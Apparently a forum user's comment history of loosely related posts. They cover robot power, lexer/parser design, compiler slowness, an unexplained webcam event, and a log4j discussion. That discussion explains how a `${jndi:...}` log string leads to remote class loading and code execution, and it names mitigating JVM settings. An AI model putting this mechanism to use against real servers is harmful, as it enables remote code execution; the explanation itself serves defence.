That's a very impressive story! I was hoping this post would get a bit more attention so I could read of more tales like this, but I guess this will have to do.
I assume that a robot capable of handling 400lb must have a pretty beefy power supply. You can probably get an intuitive sense of how much damage a robot can do to you by imagining what would happen if all of the power output was directed directly at your body (in the form of heat/electrical/kinetic). A tiny 5v motor might on a breadboard might be enough warm your hand up or fling a small pebble toward you, but a motor that requires one of those bigger 400v 3-phase 60A supplies can probably pull enough energy to melt iron or generate the same kinetic energy as some military ordnances.
The title of this post stood out to me because it's a fairly niche topic that I've been meaning to write a 'rant' post about myself. I think in a very 'pure' parsing theory sense, there is no real advantage to separating the lexer and the parser. I claim that any counter-argument is due to the limitations of individual software tools, and their inability to let up specify the grammar that we actually want.
If I recall correctly, the original historical reason for separating them was due to memory limitations on early mainframe computers. Actual source code would be fed into the 'lexer' and a stream of 'tokens' would come out the other end and then be saved to a file, which would then be fed into the next stage.
Having said this, you can ask "In practice, is there currently an advantage to separating the lexer and the parser with the tools we use now?" The answer is 'yes', but I claim that this is just a limitation of the tools we have available to us today. Tokens are usually described using a simple regular expression, whereas the parsing rules are 'context free', so worst-case complexity of parsing the two is not the same. If you pull tokens into the parser and just parse them as naive 'single-character parser items', then you end up doing more work than you would have otherwise since your parser is going to try all kinds of unlikely and impossible chopped up token combinations. The other big issue is memory savings. Turning every token into a (small) parse tree is going to increase memory usage 10-20x (depending on the length of your tokens).
Personally, I think there is a substantial need for more advanced ways of describing language grammars. The ideal model would be to have various kinds of annotations or modifiers that you could attach to grammar rules, and then the parser generator would do all sorts optimizations based on the constraints that these annotations imply. Technically, we already do this. It's called putting the lexer in one file, and the parser in another file. There is no good reason why we can't specify both using a more unified grammar model and let the parser generator figure out what to do about each rule to be as efficient as possible.
The computer science theory behind grammars seems to have peaked in the 1980s, and there doesn't seem to have been many new innovations that have made it into daily programming life since then.
One of the reasons that I stopped working on it was because of how slow it became, so I might be able to contribute to answering your question.
Initially, when the compiler was simpler, it was actually much faster. I was able to do some meaningful proof of concept demos with it like compiling a small microkernel, and compiling most of its own source code. Of course, the natural thing to do is to make it so that could cross-compile itself and run in the browser, and that's where it became terribly slow, which required more code to optimize, and the new code that was added to make it faster in the long term made it much slower in the short term.
To start with, if you think of a simple piece of code like this:
if ( 1 ) { putc('a'); }
This is only a 23 byte character program, so why should it be slow to compile? Well, the first stage of parsing this program involves tokenization. In this short program, I count 16 different 'tokens' (including the whitespace). If you want to have even the simplest data structure to describe one of your 'tokens', that only contains a single pointer to an offset in the program, then you will need to consume 16 pointers just for the tokens. On a 64 bit machine, you'll have 8 byte pointers, and 16 * 8 = 128 bytes, just for the pointers into the byte array of the program! And we haven't even started talking about the memory overhead of all the other things you'll need to describe about these tokens in your token object.
So, now we already have a memory overhead that is more than 5 times as big as the program, but we also have to build the parse tree, control flow graphs, linker objects etc. and you also have to pull in a mess of header files, bloated libraries etc. If you're wasteful with memory in the compiler, you can easily run out of memory from compiling a few megabytes of source code. Being more intelligent with memory management requires copying memory around a lot, which also adds to the latency.
So, now you need to think about optimizing your memory use, and do 'smarter' things that trade memory usage for CPU. Plus, you're likely to also start needing free/delete a lot from heap memory which is a system call and therefore slower than a call within your program. By the time you implement all this 'optimization', you compiler has become an incredibly complicated and bloated system that requires even more code to optimize all the opportunities for improvement.
A couple weeks ago I was working away in the terminal when all of a sudden, my USB camera turned on and its light started flashing at me indicating something had just started interacting with my webcam. I immediately assumed "Oh, that's probably just some hackers watching me through my web-cam.", so I looked through /var/log a bit and noticed that it had just re-detected all USB devices and two new users had just been added to my system:
Does anyone know what these new users are for, and why they were added just now instead of at install time? I googled a bit, but couldn't find any recent news about it.
I've been thinking about this since I saw it here on HN yesterday, and I can't help but entertain the idea that this might end up being 'the worst software security flaw ever'.
We tested this on several JVM versions and found you needed to go really far back, to around Java 8u121 I think, to see the specific exploit using LDAP+HTTP class loading work because they changed the value of the JVM property that allows loading a class file from a remote codebase... however, as this article points out, quite mind blowingly, early JDK11 releases also seem to have been vulnerable (I believe at least JDK 11.0.2 is not vulnerable anymore, but can't confirm right now).
We also found that other similar exploits based on JNDI can work even if the one based on LDAP redirecting class loading to a malicious HTTP server doesn't (I won't mention it here because it makes it much easier to exploit, so disabling log4j's evaluation of jndi patterns or migrating to the patched version is absolutely necessary, still).
Interesting, thank you for that analysis. From what I understand, the RCE exploit really needs two things to work: 1) The interpretation of the JNDI reference by log4j, and 2) The 'auto-execute loaded classes' (which I don't quite understand).
Is there any kind of low-level flag you can pass to Java or your environment to completely disable JNDI? I recall that there is a flag you can pass to log4j, but I can't see any reason why I would ever use JNDI anywhere in Java.
Also, do you have any additional insights on how exactly the mechanism for 2) works? From what I understand, this is a feature of Java itself?
To list the modules your JDK has, use `java --list-modules`.
If you're not using the module system, you can't completely disable JNDI, but you can tell the JVM to not load classes from a remote host by setting the system property "com.sun.jndi.ldap.object.trustURLCodebase" to "false". This has been the default in most JDKs for several years, but apparently some folks still somehow got victim to this. There are other configuration properties you can adjust listed in the javadocs for javax.naming.Context at https://docs.oracle.com/javase/8/docs/api/index.html?javax/n....
The LDAP/JNDI exploit works because when JNDI performs a lookup (and in this case, simply logging a message with `${jndi:...}` on log4j would trigger that), it might connect to a remote host that's in control of the attacker... the LDAP response from whatever LDAP server that got contacted may contain all sorts of instructions for the JVM to load classes remotely, from a HTTP server anywhere on the internet, for example. The attack I've seen used the LDAP ObjectFactory that lets the LDAP response tell where to get the bytecode of another ObjectFactory via any URL. If the JVM "com.sun.jndi.ldap.object.trustURLCodebase" property were false, this would've been blocked, but otherwise, the attacker class would be loaded and could immediately run (via a static block for example) any Java code at all on your server. Notice that this is a feature of LDAP, not a bug, but it should never have been possible for untrusted input to be used in JNDI lookup, for obvious reasons. There are other ways to "bypass" this flag by using other LDAP features that load remote code (won't list them here, but they're easy to find if you know LDAP and JNDI) or using another JNDI provider (RMI, CORBA) in case the libraries you have in the classpath include another ObjectFactory that loads remote code (e.g. many JDBC Drivers, Apache Tomcat etc.) - it's impossible to tell how many similar attacks become possible once you have JNDI opened up to untrusted input.
This attack has been known for several years... if you look hard enough you'll find whole toolkits showing how to perform these attacks dating back at least 6 years, from what I found.
Would it? It's a very common logging package, and Java is cross-platform. I also think OSes tend to be updated more often than JDKs (but I'm not sure).
It's used by Elasticsearch, so possible you could exploit the log aggregation service even if the app-level logging library isn't vulnerable, but you'd need a way to make sure the first-level logging doesn't interpret the format string.